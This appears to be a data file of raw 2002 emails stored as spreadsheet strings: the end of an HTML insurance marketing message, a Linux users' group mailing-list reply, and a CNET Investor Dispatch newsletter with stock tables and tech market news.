 color=3D"#003399"&gt;&lt;b&gt;Address2:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"address2" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"18%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                           &lt;td width=3D"7%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"3%"&gt;&lt;input type=3D"text" =
 name=3D"state2" size=3D"2"&gt;&lt;/td&gt;
                           &lt;td width=3D"5%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#003399"&gt;&lt;b&gt;Zip:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"16%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"10"&gt;&lt;/td&gt;
                           &lt;td rowspan=3D"2" width=3D"25%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"26%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td width=3D"18%" colspan=3D'5'&gt;=20
                             &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"tom@insuranceiq.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"LegalIQ Agent"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/legaliq/logosm.gif" width=3D"550" =
 height=3D"61" alt=3D'LegalIQ - Part of the IQ Group of Companies'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"7"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#003399"&gt;=20
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"1" color=3D"#FFFFFF"&gt;We=20
                 don't want anybody to receive our mailing who does not =
 wish to=20
                 receive them. This is professional communication sent to =
 insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;&lt;font =
 color=3D"#66FF00"&gt;http://www.insurancemail.net&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;&lt;font =
 color=3D"#66FF00"&gt;Legal Notice&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_C9DC9_01C230C6.21818770--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-30 at 13:17, Patton, Tony wrote:
 8&lt;
 &gt; 
 &gt; Can someone translate this for me? Lost all sense of Irish when moved
 &gt; over the border about 10 years ago. Not by choice mind you :-(
 &gt; 
 8&lt;
 Thanks to all who replied.
 Are there many from this list going to the LBW?
 I am trying to get the thursday and friday off work to get to it.
 Looking doubtful as it is very near the start of term. Bloody academic
 institutes :-).
 it only going to take me about 6 hours or so to get there :-(
 -- 
 +------------------------------------+---------------------------------+
 | Tony Patton                        |                                 |
 | MIS Software Developer/*nix        | Tel  : +44 28 7127 6443         |
 |   Systems Administrator            | Fax  : +44 28 7126 0520         |
 | North West Institute of F &amp; H.E.   | Mob  : +44 7764 905 955         |
 | Strand Road                        |                                 |
 | Derry                              | ICQ# : 113 069 081              |
 | BT48 7BY                           |                                 |
 +------------------------------------+---------------------------------+
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Investor Dispatch&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee" link="#0000ff" vlink="#0000ff"&gt;
 &lt;div align="center"&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;table width=612 bgcolor="#ffffff" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;&lt;img src="http://www.cnet.com/i/nl/inv/hd.gif" width=442 height=60 alt="CNET Investor Dispatch"&gt;&lt;br&gt;
 &lt;table bgcolor="#ffcc00" width=442 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;!-- ad --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- ad --&gt;
 &lt;br&gt;
 &lt;!-- lookup --&gt;
 &lt;table width=160 bgcolor="#cccccc" cellpadding=1 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;table width="100%" bgcolor="#ffffff" cellpadding=9 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;form name="lookupForm" method="get" action="http://investor.cnet.com/investor/quotes/quote-process/0-0.html"&gt;
 &lt;font face="arial, helvetica" color="#333334" size="-1"&gt;&lt;b&gt;Quote Lookup&lt;/b&gt;&lt;br&gt;Enter symbol:&lt;/font&gt;&lt;br&gt;
 &lt;input type="text" name="symbol" size=10 value=""&gt;
 &lt;input name="target" type="hidden" value="detailquote"&gt;
 &lt;input type="submit" value="Go!"&gt;&lt;br&gt;
 &amp;#183; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQ-38MbKQCL5-NPyEdsR" &gt;Symbol Lookup&lt;/a&gt;&lt;br&gt;
 Quotes delayed 20+ minutes&lt;/font&gt;
 &lt;/td&gt;&lt;/form&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /lookup --&gt;
 &lt;p&gt;
 &lt;!-- nav --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_sect.gif" width=160 height=20 alt="Investor Sections"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dmauj7pqfRO9R6BpKlR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRbnk8ZjZWSoS2P4Jm4R" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyXIeMcXydit0M-0OvrR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMnrXSV41H99K8FZuSiR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GR36b2qHCu4jNix1DPPR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XV2aQHSAwQ4lAUw-5WnR" &gt;NXTP&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.42&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;36.42%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkZja8L3ibgi4cHr7W6TiR" &gt;NXTL&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;6.53&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;30.60%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jpiJCCAV-hDEc2lRbPR" &gt;GENU&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.77&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;28.84%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzz4g_jabman8WccrYnR" &gt;BINX&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;25.81%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSIVOp4-Hcoh57BymNzeR" &gt;CYCL&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.759&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;23.67%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72QL4pe0O9U4lR0vdksR" &gt;ASGN&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-38.48%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=69-CY-iIoWgaO4V_QyMoAH4OpRzLxFR" &gt;PLUM&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.2&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-28.87%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7HiFWVi6pURwMpopr9R" &gt;QFAB&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.92&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-28.53%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3VjS0HHcTYjvQ8Rgn5rR" &gt;SONT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.16&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-26.28%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkruyXLH6DtZs6swzdONiR" &gt;RAZFD&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.511&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-13.09%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers --&gt;
 &lt;p&gt;
 &lt;!-- ad --&gt;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href="http://clickthru.online.com/Click?q=be-B7ixQCpTpl-DNQJbnY9y52GfwH4R" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBmiHV3K74p01K7fy3rR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQBEeairAP_kMFIM55iR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1renylTO_Iti64Q9t8PR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrdXcG9-pEvKY-qkCKnR" &gt;ZDNet: PeopleSoft&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;!-- ad --&gt;
 &lt;/td&gt;
 &lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 &lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000" rowspan=2&gt;&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=430 bgcolor="#ffffff"&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 &lt;tr valign=top&gt;&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=412&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;font size="-2"&gt;July 16, 2002&lt;/font&gt;&lt;br&gt;
 &lt;!-- /index --&gt;
 &lt;table width="100%" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9ZnMclSkMRUVolYrBeR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8473.11 &amp;nbsp;&lt;font color=#cc0000&gt;-166.08&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1bMZN2gY0VXXjhrHNHyR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1375.26 &amp;nbsp;&lt;font color=#cc0000&gt;-7.36&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxzX2HKEJlh9GpMUHM3FR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;900.94 &amp;nbsp;&lt;font color=#cc0000&gt;-16.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyTVwpeWhKPAKa1CPIuR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;992.91 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-12.40&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /index --&gt;
 &lt;br&gt;
 &lt;table width=93 align=left cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;a href="?tag=dd.inv.dht.hed.0"&gt;&lt;img src="http://www.cnet.com/i/ne/pt/2001/03/pts_0313nov.jpg" width=85 height=110 border=0&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size=3&gt;&lt;b&gt;Techs slump with Intel&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 With investors selling Intel shares before its post-market close earnings announcement, technology stocks dropped Tuesday.
 &lt;p&gt;
 Despite generally upbeat remarks on the economy by Fed Chair Alan Greenspan and news of a profitable quarter from Nextel Communications, CNET's Tech index slipped 12.4 points, or 1.25 percent, to 992.91. The tech-laden Nasdaq composite index fell 7.36 points, or 0.53 percent, to 1,375.26.
 &lt;p&gt;
 Worse-than-expected earnings from construction machinery maker Caterpillar helped depress broader markets. The Dow Jones industrial average lost 166.0 points, or 1.92 percent, to 8,473.1--for its seventh consecutive losing session. The S&amp;P 500 shed 16.99 points, or 1.85 percent, to 900.94--another multi-year low.
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" width=8 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;!-- top news --&gt;
 &lt;table width=400 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/inv/sub_news.gif" width=192 height=19 alt="Top Investor News"&gt;&lt;/td&gt;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href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc35hZULfLHDx1984BOsR" &gt;Microsoft reveals media XP details &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Microsoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
 Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.&lt;br&gt;&lt;B&gt;MICROSOFT CORP 51.25 -1.06% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQKUSVrMzb-Byo4hJdlR" &gt;Intel layoffs possible&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Chipmaker Intel may be on the verge of announcing massive layoffs or other cuts amid a slow market for personal computers, according to reports.
 Intel CEO Craig Barrett is scheduled to speak to employees after stock markets close Tuesday, according to The Wall Street Journal. At about the same time, the chipmaker will discuss its second-quarter results on a conference call with analysts.&lt;br&gt;&lt;B&gt;INTEL CORP 18.36 -3.97% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOfc7MtOvAKcnvjbgw4R" &gt;Nextel Turns Profitable, Revenues Jump &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Nextel Communications Inc., the nation's No. 5 wireless telephone company, on Tuesday said it turned profitable in its second quarter, driven by strong customer demand that translated to a 25 percent revenue increase.
 Nextel also said it expected 2002 operating cash flow of at least $3 billion compared with an earlier forecast calling for $2.5 billion.&lt;br&gt;&lt;B&gt;NEXTEL COMMUNIC'NS'A' 6.53 30.6% &lt;/B&gt;
 &lt;!-- /top news --&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;!-- rtsq --&gt;
 &lt;font color="#999999"&gt;&lt;b&gt;Also from CNET&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;table width=400 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr bgcolor="#cccccc"&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 Real-time stock quotes from CNET News.com Investor.&lt;br&gt;30-day &lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7wvbAuaRaT-Dc13yE_rR" &gt;free trial&lt;/a&gt;!
 &lt;!-- /rtsq --&gt;
 &lt;p&gt;
 &lt;!-- broker reports --&gt;
 &lt;table width=400 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/inv/sub_brok.gif" width=192 height=19 alt="Today's Broker Reports"&gt;&lt;/td&gt;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href="http://clickthru.online.com/Click?q=d1-ulOzQpErJt-obd110-kl0aSxkZlR" &gt;Banc of America Securities begins coverage of Power Integrations with a "market performer" rating in tech notes 7/16/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Douglas Lee says the maker of power supply integrated circuits is building a market niche with a more efficient and reliable technology than traditional approaches to converting AC-to-DC power supplies. He also notes Power Integrations is expanding its market with DC-to-DC power supply products, and says the firm's growth is based on converting today's power supplies to its more efficient technologies. As a result, the company doesn't need a boost in end-market demand to grow, Lee says. Although he sees a large, untapped market for Power Integrations and likes its long-term prospects, Lee suggests the stock is fairly valued. He believes shares of POWI are unlikely to rise much in the short term.&lt;br&gt;&lt;B&gt;POWER INTEGRATIONS 18.72 5.23% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDK8EzrrXGugH6NQYvU4R" &gt;Visit the Brokerage Center&lt;/a&gt;
 &lt;!-- /broker reports --&gt;
 &lt;p&gt;
 &lt;!-- ceo wealth meter --&gt;
